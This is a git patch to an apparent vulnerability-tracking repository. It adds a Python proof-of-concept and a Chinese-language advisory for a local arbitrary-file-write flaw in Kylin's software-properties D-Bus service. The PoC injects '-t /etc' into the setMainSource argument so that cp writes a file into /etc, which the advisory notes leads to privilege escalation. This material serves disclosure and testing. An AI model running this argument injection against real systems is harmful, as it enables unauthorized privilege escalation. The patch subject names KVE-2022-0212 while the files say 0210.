From da8576a79ef6364b251d6d0a6f6cfa08f4c320cd Mon Sep 17 00:00:00 2001
From: yangjipeng <yangjipeng@kylinos.cn>
Date: Fri, 21 Oct 2022 09:54:42 +0800
Subject: [PATCH] ADD KVE-2022-0212

---
 .../2022/KVE-2022-0210/poc.py                 | 16 ++++++++++++++++
 .../2022/yaml/KVE-2022-0210.yaml              | 19 +++++++++++++++++++
 vulnerability_list.yaml                       |  4 +++-
 3 files changed, 38 insertions(+), 1 deletion(-)
 create mode 100644 kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
 create mode 100644 kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml

diff --git a/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
new file mode 100644
index 00000000..19f07b57
--- /dev/null
+++ b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+
+import sys
+import dbus
+import os
+
+def set_main_source(target_dir, src_file):
+  bus = dbus.SystemBus()
+  obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties")
+  proxy = dbus.Interface(obj, "com.kylin.software.properties.interface")
+  proxy.setMainSource([f'-t {target_dir} {src_file}'])
+  os.system('touch set_main_source.txt')
+
+set_main_source("/etc", os.path.realpath('./set_main_source.txt'))
+os.system('ls -l /etc/set_main_source.txt')
+os.system('rm set_main_source.txt')
\ No newline at end of file
diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
new file mode 100644
index 00000000..60a558db
--- /dev/null
+++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
@@ -0,0 +1,19 @@
+id: KVE-2022-0210
+source: openKylin Community
+info:
+  name: 源管理服务的setMainSource接口任意文件写入漏洞。
+  severity: critical
+  description: |
+    com.kylin.software.properties.interface.setMainSource接口存在任意文件写入漏洞。实现方法是调用命令"cp file /etc/apt/sources.list"。但如果传递的参数为"['-t /etc /path/to/evil.txt']，由于开发者在实现时会将这个字符串按空格进行分割，并作为参数传递到cp命令，因此就会触发命令 "cp -t /etc /path/to/evil.txt /etc/apt/sources.list"，从而实现任意文件夹的任意文件写入，导致权限提升。任意命令。
+  scope-of-influence:
+    kylin-software-properties< 0.0.1-127
+  reference:
+    - https://kylinos.cn/support/loophole/patch/1871.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: None
+    cwe-id: None
+    cnvd-id: None
+    kve-id: KVE-2022-0210
+  tags: kve2022,dbus
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 1148d39b..475177cc 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -22,4 +22,6 @@ cve:
   polkit:
     - CVE-2021-4034
 cnvd:
-kve:
\ No newline at end of file
+kve:
+  kylin-software-properties
+    - KVE-2022-0210
\ No newline at end of file
-- 
Gitee